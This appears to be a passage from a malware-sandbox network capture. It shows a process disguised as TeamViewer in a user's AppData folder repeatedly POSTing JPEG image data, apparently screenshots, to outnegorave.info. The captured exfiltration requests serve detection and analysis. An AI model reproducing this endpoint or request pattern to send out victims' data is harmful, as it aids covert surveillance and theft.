                                                                                                                                    2021-09-15 11:51:24 UTC83OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 30 39 39 30 30 39 35 33 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3509900953--
                                                                                                                                    2021-09-15 11:51:27 UTC83INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:51:27 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=fd09de06337a777c9b5109e018bb22d2333f045eab95a681706e4b800bb28b17; expires=Thu, 15-Sep-2022 11:51:24 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=94mfY8U91g2pH2pTIpBQg7pxoKwCyomw4nxjg9fhlFakdBSKbb7l0R5DehHkpJgxYv2ZKA%2FOukBsjywZKGMATE%2BSzd02qLavuTVnF85%2BA58vHSOWYdBhCE1kB7I9BU7s4SGk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a49819d705c4-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:51:27 UTC84INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    1192.168.2.549755172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:51:28 UTC84OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 86809
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------4132168479
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:51:28 UTC84OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 31 33 32 31 36 38 34 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------4132168479Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:51:28 UTC84OUTData Raw: bd d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 9a 0c 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9f bc fa 68 8c db 26 7c 0f 9b 21 fa a7 70 33 d6 1f 97 e1 63 b7 ce 51 99 1b b8 b1 a1 f1 67 ab f9 7b 78 d6 96 22 31 f3 ba 9d 6e ae
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcKh&|!p3cQg{x"1n
                                                                                                                                    2021-09-15 11:51:28 UTC84OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:51:28 UTC100OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:51:28 UTC116OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:51:28 UTC132OUTData Raw: 01 45 14 50 02 d2 51 4b 40 05 14 51 40 0b 40 a4 a3 34 c4 3a 8a 4a 5a 60 14 51 4b 40 82 96 8a 31 4c 42 d2 d2 51 4c 40 69 45 25 28 a0 05 14 94 a2 90 d3 10 52 d2 50 29 00 e1 4e 14 da 5a a4 26 2d 14 94 b4 c0 5a 28 a2 82 45 a2 8a 29 80 51 45 14 08 70 a5 a6 8a 51 4d 00 b4 b4 94 b4 c9 0a 5a 4a 51 4c 05 a2 8a 29 88 5a 29 29 68 10 52 d2 52 d3 40 3a 8a 41 4b 4c 90 a5 14 51 4c 05 a2 81 4b 4c 42 52 52 d1 40 08 3a d3 e9 83 ad 3e 84 0c 28 34 51 4c 90 14 b4 82 9d 8a 10 31 40 a7 53 69 c2 a9 12 c4 ef 4b 48 7a d3 85 30 10 53 a9 b4 a2 98 98 b4 51 45 02 01 4b 48 29 d4 c4 25 3a 92 8a 60 c7 52 d3 45 2d 32 47 66 94 53 69 45 34 26 38 52 d3 69 c2 99 2c 29 69 28 a6 21 68 a4 a5 a0 02 96 92 96 80 16 96 9b 4e a0 4c 29 45 25 2d 02 16 8a 4a 5a 04 14 b4 51 4c 02 94 51 4a 28 13 16 81 49
                                                                                                                                    Data Ascii: EPQK@Q@@4:JZ`QK@1LBQL@iE%(RP)NZ&-Z(E)QEpQMZJQL)Z))hRR@:AKLQLKLBRR@:>(4QL1@SiKHz0SQEKH)%:`RE-2GfSiE4&8Ri,)i(!hNL)E%-JZQLQJ(I
                                                                                                                                    2021-09-15 11:51:28 UTC148OUTData Raw: ce 96 8a 00 4d cb fd e1 f9 d7 96 fc 58 20 eb 16 38 39 ff 00 47 3f fa 11 af 53 af 2c f8 af ff 00 21 9b 3f fa e0 7f 9d 6b 4b 76 65 57 64 70 c2 96 90 52 d7 42 31 16 8a 29 29 88 5a 28 a2 81 0b 45 25 2d 30 16 8a 4a 5a 00 28 cd 14 50 21 68 a2 92 98 0e a3 34 94 53 01 68 a4 a2 81 0b 45 25 14 00 b4 b4 da 5a 00 5a 5a 6d 2d 31 0b 45 25 2d 00 2d 2d 34 52 d3 b8 85 a5 a6 d1 40 0e cd 19 a6 d2 d3 10 b4 b4 94 a2 98 85 a2 8a 28 01 68 a4 a2 81 0b 45 25 14 c0 5a 28 a2 80 16 96 9b 4b 4d 08 5e d4 b4 94 53 10 ea 5a 68 a5 a6 21 68 a4 34 51 70 16 96 92 8a 04 3a 96 9b 4b 4c 56 1d 45 34 1a 5c d3 15 87 52 e6 9b 4b 4c 43 a8 a4 a5 a6 84 38 1a 76 69 80 d2 d5 26 4b 43 e8 a6 d2 f3 4e e2 b0 b4 51 f8 d2 12 3b 53 0b 0b 4b cd 37 75 19 a2 e1 61 d9 14 bb 87 a5 33 34 66 8b 8a c3 f7 1a 3f 1a 4c
                                                                                                                                    Data Ascii: MX 89G?S,!?kKveWdpRB1))Z(E%-0JZ(P!h4ShE%ZZZm-1E%---4R@(hE%Z(KM^SZh!h4Qp:KLVE4\RKLC8vi&KCNQ;SK7ua34f?L
                                                                                                                                    2021-09-15 11:51:28 UTC164OUTData Raw: 8a 8e 8a 39 c3 90 92 8a 8e 8a 39 c3 90 92 96 a2 a9 df fe 41 f0 ff 00 d7 59 3f 92 51 ed 03 90 82 8a 28 ac cb 3a 86 f0 06 bf 14 2b 2d cc 50 40 ad 2c 71 61 e5 04 e5 dd 50 7d dc f1 96 15 b7 6f f0 a6 f1 bf e3 eb 55 82 3f fa e7 11 7f e6 45 76 1a e4 3a c8 b1 8b cd bf b0 65 fb 5d b6 02 d9 38 39 f3 d3 07 fd 69 e3 38 e3 bf 4e 3a d6 87 91 ae ff 00 d0 47 4e ff 00 c0 07 ff 00 e3 d4 ae 07 cf 94 51 45 30 3e 8e ae 6b c4 9e 21 b8 b3 bb 87 4a d2 20 fb 46 a3 3f dd 5f ee fb 9f 4e 39 cd 74 b5 c6 e8 7b 3f e1 62 ea fe 7f fa ff 00 23 f7 59 fe e6 fe 71 ff 00 8e d4 8c 3f b1 bc 65 e5 f9 ff 00 db 76 de 7f 5f 27 e7 d9 f4 cf ff 00 5a ae f8 6f c4 37 17 97 73 69 5a bc 1f 67 d4 60 fb cb fd ef 71 eb c7 39 ae 96 b8 dd 73 67 fc 2c 5d 23 c8 ff 00 5f e4 7e f7 1f dc df c6 7f f1 ea 00 ec aa 89
                                                                                                                                    Data Ascii: 99AY?Q(:+-P@,qaP}oU?Ev:e]89i8N:GNQE0>k!J F?_N9t{?b#Yq?ev_'Zo7siZg`q9sg,]#_~
                                                                                                                                    2021-09-15 11:51:28 UTC169OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 31 33 32 31 36 38 34 37 39 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------4132168479--
                                                                                                                                    2021-09-15 11:51:42 UTC169INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:51:42 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=a4f4f25b5a71c77a54518e53009b542e750d29bb14bd933b08e818c9324c6ca1; expires=Thu, 15-Sep-2022 11:51:28 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=APaiaLPf7kEZ%2Bsz%2FokPocu2MA5SthMkF0tQm5i%2FJwIh5KkVVhrISPAbOEttg7OpOB5lJdN61IXbi22m%2FvaKNStT2G4jiJEqACoGUX3h6XqKQA58s4JNfN6R7PjKXl9Zp%2BAnK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a4b0989d1f21-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:51:42 UTC170INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    10192.168.2.549776172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:10 UTC847OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85026
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3697122959
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:10 UTC847OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 36 39 37 31 32 32 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3697122959Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:10 UTC847OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 99 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:10 UTC848OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:10 UTC863OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:10 UTC879OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:10 UTC895OUTData Raw: 8a 5a 00 28 a2 8a 00 5a 05 25 19 a6 21 d4 52 52 d3 00 a2 8a 5a 04 14 b4 51 8a 62 16 96 92 8a 62 03 4a 29 29 45 00 28 a4 a5 14 86 98 82 96 92 81 48 07 0a 70 a6 d2 d5 21 31 68 a4 a5 a6 02 d1 45 14 12 2d 14 51 4c 02 8a 28 a0 43 85 2d 34 52 8a 68 05 a5 a4 a5 a6 48 52 d2 52 8a 60 2d 14 51 4c 42 d1 49 4b 40 82 96 92 96 9a 01 d4 52 0a 5a 64 85 28 a2 8a 60 2d 14 0a 5a 62 12 92 96 8a 00 41 d6 9f 4c 1d 69 f4 20 61 41 a2 8a 64 80 a5 a4 14 ec 50 81 8a 05 3a 9b 4e 15 48 96 27 7a 5a 43 d6 9c 29 80 82 9d 4d a5 14 c4 c5 a2 8a 28 10 0a 5a 41 4e a6 21 29 d4 94 53 06 3a 96 9a 29 69 92 3b 34 a2 9b 4a 29 a1 31 c2 96 9b 4e 14 c9 61 4b 49 45 31 0b 45 25 2d 00 14 b4 94 b4 00 b4 b4 da 75 02 61 4a 29 29 68 10 b4 52 52 d0 20 a5 a2 8a 60 14 a2 8a 51 40 98 b4 0a 4a 51 40 8d 0d 24 7e
                                                                                                                                    Data Ascii: Z(Z%!RRZQbbJ))E(Hp!1hE-QL(C-4RhHRR`-QLBIK@RZd(`-ZbALi aAdP:NH'zZC)M(ZAN!)S:)i;4J)1NaKIE1E%-uaJ))hRR `Q@JQ@$~
                                                                                                                                    2021-09-15 11:52:10 UTC911OUTData Raw: 02 d1 49 4b 40 0b 45 25 2d 31 0b 45 25 2d 02 16 94 52 52 d3 10 51 49 4b 4c 05 a5 a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a 4a 86 cb 48 52 69 29 28 cd 26 3b 08
                                                                                                                                    Data Ascii: IK@E%-1E%-RRQIKL!JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&JHRi)(&;
                                                                                                                                    2021-09-15 11:52:10 UTC927OUTData Raw: 05 bb 7f 6a 4d 25 dc ee b8 ca 31 45 4f a6 39 27 eb f9 57 3d af fc 35 d4 2c f7 4d a4 49 f6 d8 47 3e 5b 61 65 1f d1 bf 4f a5 33 c4 1f 0e 35 1b 0d d3 69 4c 6f a0 1c ec 03 12 a8 fa 7f 17 e1 cf b5 74 1e 11 f0 36 86 6d 63 be b9 97 fb 46 43 d5 19 76 a4 6d dd 4a 75 c8 ee 1b f2 a4 07 95 cd 14 90 4a d1 4f 1b c7 22 1c 32 3a 90 41 f7 06 99 5d 1f c4 24 48 fc 6b 7e 91 aa a2 28 88 05 51 80 07 94 95 ce 55 08 2a de 9b 64 d7 d7 42 30 76 a0 e5 db d0 55 4a e8 3c 2f b7 17 20 f5 f9 7f 2e 6a 64 ec b4 22 a5 45 4d 73 b5 7b 1b 96 7a 35 b8 4d 96 d6 62 4d a3 92 53 71 fc 6a be a1 e1 c1 70 ac 23 b5 68 66 1d 0a a1 1f 98 ad d1 bf fb 36 dc 45 93 18 ce fc 7f 7f 3d ff 00 0c 56 de 9b e6 fd 85 3c fc ee c9 db bb ae de df d6 b0 c4 d2 95 0c 3a c4 29 6b d8 f4 61 8e a7 5a 7e ca 30 f7 4f 16 9a 27
                                                                                                                                    Data Ascii: jM%1EO9'W=5,MIG>[aeO35iLot6mcFCvmJuJO"2:A]$Hk~(QU*dB0vUJ</ .jd"EMs{z5MbMSqjp#hf6E=V<:)kaZ~0O'
                                                                                                                                    2021-09-15 11:52:10 UTC930OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 36 39 37 31 32 32 39 35 39 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3697122959--
                                                                                                                                    2021-09-15 11:52:10 UTC930INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:10 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=2a9deea1d8292f695f981fd460a01ba98c8849537bd84c288126da59e8e51793; expires=Thu, 15-Sep-2022 11:52:10 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=itTv5XKz%2BidmsKqJJqK61CBds6hI07FA260TcfKVrPQnOEYSPGiQIQPN9fYKaa%2FMkyqxDlpzVBcIRnXx5mPVIAo8HOTqXAPQi65jvhTMiyCLFupn15PjPWpYzNo8NyCvXfGD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5b6b9f6178a-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:10 UTC931INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    11192.168.2.549782172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:11 UTC931OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85132
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------847302753
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
